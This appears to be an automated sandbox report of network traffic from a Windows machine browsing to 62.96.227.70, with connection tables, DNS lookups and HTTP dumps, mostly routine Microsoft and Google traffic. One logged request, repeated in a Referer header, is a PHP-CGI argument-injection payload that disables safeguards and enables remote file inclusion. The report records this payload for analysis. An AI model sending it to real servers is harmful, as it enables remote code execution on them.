        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
        No static file info
        TimestampSource PortDest PortSource IPDest IP
        Oct 1, 2024 08:34:05.393596888 CEST49675443192.168.2.4173.222.162.32
        Oct 1, 2024 08:34:15.003451109 CEST49675443192.168.2.4173.222.162.32
        Oct 1, 2024 08:34:15.811085939 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:15.811297894 CEST4973680192.168.2.462.96.227.70
        Oct 1, 2024 08:34:15.816065073 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:15.816137075 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:15.816140890 CEST804973662.96.227.70192.168.2.4
        Oct 1, 2024 08:34:15.816215038 CEST4973680192.168.2.462.96.227.70
        Oct 1, 2024 08:34:15.816384077 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:15.821083069 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.505847931 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.505861998 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.505985975 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:16.577667952 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:16.582541943 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.772686958 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.772711039 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:34:16.772790909 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:34:19.141976118 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.142021894 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.142148018 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.142983913 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.143006086 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.697040081 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:19.697118998 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:19.697222948 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:19.699014902 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:19.699052095 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:19.779890060 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.780670881 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.780699015 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.782181025 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.782246113 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.783957005 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.784044027 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.830113888 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:19.830121994 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:19.876912117 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:20.337960005 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.338040113 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.342174053 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.342196941 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.342444897 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.380844116 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.427406073 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.609360933 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.609426022 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.609565973 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.609621048 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.609652996 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.609653950 CEST49741443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.609673977 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.609693050 CEST44349741184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.648391962 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.648430109 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:20.648569107 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.648855925 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:20.648899078 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.286134958 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.286245108 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.294194937 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.294204950 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.294440985 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.296994925 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.343405962 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.563061953 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.563117981 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.563318968 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.565042973 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.565080881 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:21.565108061 CEST49742443192.168.2.4184.28.90.27
        Oct 1, 2024 08:34:21.565124035 CEST44349742184.28.90.27192.168.2.4
        Oct 1, 2024 08:34:27.514925003 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:27.515022993 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:27.515105963 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:27.516582012 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:27.516619921 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:28.278016090 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:28.278179884 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:28.280992031 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:28.281013966 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:28.281259060 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:28.330161095 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:28.832473993 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:28.875435114 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084737062 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084758043 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084765911 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084774971 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084794998 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084830046 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.084872007 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.084928036 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.084928036 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.085197926 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.085249901 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.085263968 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.085282087 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.085326910 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.561384916 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.561438084 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.561465979 CEST49743443192.168.2.44.245.163.56
        Oct 1, 2024 08:34:29.561484098 CEST443497434.245.163.56192.168.2.4
        Oct 1, 2024 08:34:29.683691978 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:29.683862925 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:29.683919907 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:31.712264061 CEST49740443192.168.2.4172.217.16.132
        Oct 1, 2024 08:34:31.712290049 CEST44349740172.217.16.132192.168.2.4
        Oct 1, 2024 08:34:56.932434082 CEST5998053192.168.2.41.1.1.1
        Oct 1, 2024 08:34:56.937258005 CEST53599801.1.1.1192.168.2.4
        Oct 1, 2024 08:34:56.937330961 CEST5998053192.168.2.41.1.1.1
        Oct 1, 2024 08:34:56.937414885 CEST5998053192.168.2.41.1.1.1
        Oct 1, 2024 08:34:56.942173958 CEST53599801.1.1.1192.168.2.4
        Oct 1, 2024 08:34:57.390578985 CEST53599801.1.1.1192.168.2.4
        Oct 1, 2024 08:34:57.394699097 CEST5998053192.168.2.41.1.1.1
        Oct 1, 2024 08:34:57.399799109 CEST53599801.1.1.1192.168.2.4
        Oct 1, 2024 08:34:57.399863005 CEST5998053192.168.2.41.1.1.1
        Oct 1, 2024 08:35:00.830374956 CEST4973680192.168.2.462.96.227.70
        Oct 1, 2024 08:35:00.836437941 CEST804973662.96.227.70192.168.2.4
        Oct 1, 2024 08:35:01.785037041 CEST4973580192.168.2.462.96.227.70
        Oct 1, 2024 08:35:02.311589003 CEST804973562.96.227.70192.168.2.4
        Oct 1, 2024 08:35:05.949908018 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:05.950000048 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:05.950105906 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:05.951127052 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:05.951162100 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.668809891 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.668895006 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.673069954 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.673098087 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.673443079 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.710726023 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.751429081 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991529942 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991588116 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991628885 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991646051 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991667986 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.991709948 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.991745949 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.991769075 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.992090940 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.992158890 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.992171049 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.992233038 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.992881060 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.992952108 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.993016005 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:07.993073940 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.998280048 CEST59982443192.168.2.44.245.163.56
        Oct 1, 2024 08:35:07.998306036 CEST443599824.245.163.56192.168.2.4
        Oct 1, 2024 08:35:14.386338949 CEST4972480192.168.2.493.184.221.240
        Oct 1, 2024 08:35:14.391494989 CEST804972493.184.221.240192.168.2.4
        Oct 1, 2024 08:35:14.391546011 CEST4972480192.168.2.493.184.221.240
        Oct 1, 2024 08:35:17.302305937 CEST4973680192.168.2.462.96.227.70
        Oct 1, 2024 08:35:17.307738066 CEST804973662.96.227.70192.168.2.4
        Oct 1, 2024 08:35:17.307895899 CEST4973680192.168.2.462.96.227.70
        Oct 1, 2024 08:35:19.191641092 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:19.191730976 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.191899061 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:19.192089081 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:19.192122936 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.850101948 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.850402117 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:19.850438118 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.851557016 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.851891041 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:19.852075100 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:19.893194914 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:29.752350092 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:29.752507925 CEST44359984172.217.16.132192.168.2.4
        Oct 1, 2024 08:35:29.752589941 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:31.477824926 CEST59984443192.168.2.4172.217.16.132
        Oct 1, 2024 08:35:31.477854013 CEST44359984172.217.16.132192.168.2.4
        TimestampSource PortDest PortSource IPDest IP
        Oct 1, 2024 08:34:15.062406063 CEST53544251.1.1.1192.168.2.4
        Oct 1, 2024 08:34:15.097279072 CEST53651211.1.1.1192.168.2.4
        Oct 1, 2024 08:34:16.089076042 CEST53561031.1.1.1192.168.2.4
        Oct 1, 2024 08:34:19.132450104 CEST5037853192.168.2.41.1.1.1
        Oct 1, 2024 08:34:19.132950068 CEST5466953192.168.2.41.1.1.1
        Oct 1, 2024 08:34:19.139803886 CEST53503781.1.1.1192.168.2.4
        Oct 1, 2024 08:34:19.139945984 CEST53546691.1.1.1192.168.2.4
        Oct 1, 2024 08:34:25.960665941 CEST138138192.168.2.4192.168.2.255
        Oct 1, 2024 08:34:33.125905037 CEST53534781.1.1.1192.168.2.4
        Oct 1, 2024 08:34:51.870517969 CEST53543011.1.1.1192.168.2.4
        Oct 1, 2024 08:34:56.931669950 CEST53539241.1.1.1192.168.2.4
        Oct 1, 2024 08:35:14.321247101 CEST53647431.1.1.1192.168.2.4
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Oct 1, 2024 08:34:19.132450104 CEST192.168.2.41.1.1.10xa18eStandard query (0)www.google.comA (IP address)IN (0x0001)false
        Oct 1, 2024 08:34:19.132950068 CEST192.168.2.41.1.1.10xe747Standard query (0)www.google.com65IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Oct 1, 2024 08:34:19.139803886 CEST1.1.1.1192.168.2.40xa18eNo error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
        Oct 1, 2024 08:34:19.139945984 CEST1.1.1.1192.168.2.40xe747No error (0)www.google.com65IN (0x0001)false
        • fs.microsoft.com
        • slscr.update.microsoft.com
        • 62.96.227.70
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.44973562.96.227.70803120C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        Oct 1, 2024 08:34:15.816384077 CEST562OUTGET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp HTTP/1.1
        Host: 62.96.227.70
        Connection: keep-alive
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Oct 1, 2024 08:34:16.505847931 CEST1236INHTTP/1.1 404 Not Found
        Content-Type: text/html
        Server: Microsoft-IIS/8.5
        X-Powered-By: ASP.NET
        Date: Tue, 01 Oct 2024 06:33:26 GMT
        Content-Length: 1245
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
        Oct 1, 2024 08:34:16.505861998 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
        Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
        Oct 1, 2024 08:34:16.577667952 CEST503OUTGET /favicon.ico HTTP/1.1
        Host: 62.96.227.70
        Connection: keep-alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Referer: http://62.96.227.70/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9
        Oct 1, 2024 08:34:16.772686958 CEST1236INHTTP/1.1 404 Not Found
        Content-Type: text/html
        Server: Microsoft-IIS/8.5
        X-Powered-By: ASP.NET
        Date: Tue, 01 Oct 2024 06:33:26 GMT
        Content-Length: 1245
        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
        Oct 1, 2024 08:34:16.772711039 CEST169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
        Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
        Oct 1, 2024 08:35:01.785037041 CEST6OUTData Raw: 00
        Data Ascii:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.44973662.96.227.70803120C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        Oct 1, 2024 08:35:00.830374956 CEST6OUTData Raw: 00
        Data Ascii:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449741184.28.90.27443
        TimestampBytes transferredDirectionData
        2024-10-01 06:34:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        User-Agent: Microsoft BITS/7.8
        Host: fs.microsoft.com
        2024-10-01 06:34:20 UTC467INHTTP/1.1 200 OK
        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
        Content-Type: application/octet-stream
        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
        Server: ECAcc (lpl/EF06)
        X-CID: 11
        X-Ms-ApiVersion: Distribute 1.2
        X-Ms-Region: prod-neu-z1
        Cache-Control: public, max-age=209490
        Date: Tue, 01 Oct 2024 06:34:20 GMT
        Connection: close
        X-CID: 2


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.449742184.28.90.27443
        TimestampBytes transferredDirectionData
        2024-10-01 06:34:21 UTC239OUTGET /fs/windows/config.json HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
        Range: bytes=0-2147483646
        User-Agent: Microsoft BITS/7.8
        Host: fs.microsoft.com
        2024-10-01 06:34:21 UTC515INHTTP/1.1 200 OK
        ApiVersion: Distribute 1.1
        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
        Content-Type: application/octet-stream
        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
        Server: ECAcc (lpl/EF06)
        X-CID: 11
        X-Ms-ApiVersion: Distribute 1.2
        X-Ms-Region: prod-weu-z1
        Cache-Control: public, max-age=209433
        Date: Tue, 01 Oct 2024 06:34:21 GMT
        Content-Length: 55
        Connection: close
        X-CID: 2
        2024-10-01 06:34:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.4497434.245.163.56443
        TimestampBytes transferredDirectionData
        2024-10-01 06:34:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=K6e1fB3VC+yT2by&MD=XFT7N15t HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
        Host: slscr.update.microsoft.com
        2024-10-01 06:34:29 UTC560INHTTP/1.1 200 OK
        Cache-Control: no-cache
        Pragma: no-cache
        Content-Type: application/octet-stream
        Expires: -1
        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
        ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
        MS-CorrelationId: 47f4e532-0ae3-4982-a6fc-af008a5c92bf
        MS-RequestId: 02b93d08-1cfb-410a-b83c-b156d4e0e5fe
        MS-CV: tTlHsTh73U2Zv9y4.0
        X-Microsoft-SLSClientCache: 2880
        Content-Disposition: attachment; filename=environment.cab
        X-Content-Type-Options: nosniff
        Date: Tue, 01 Oct 2024 06:34:28 GMT
        Connection: close
        Content-Length: 24490
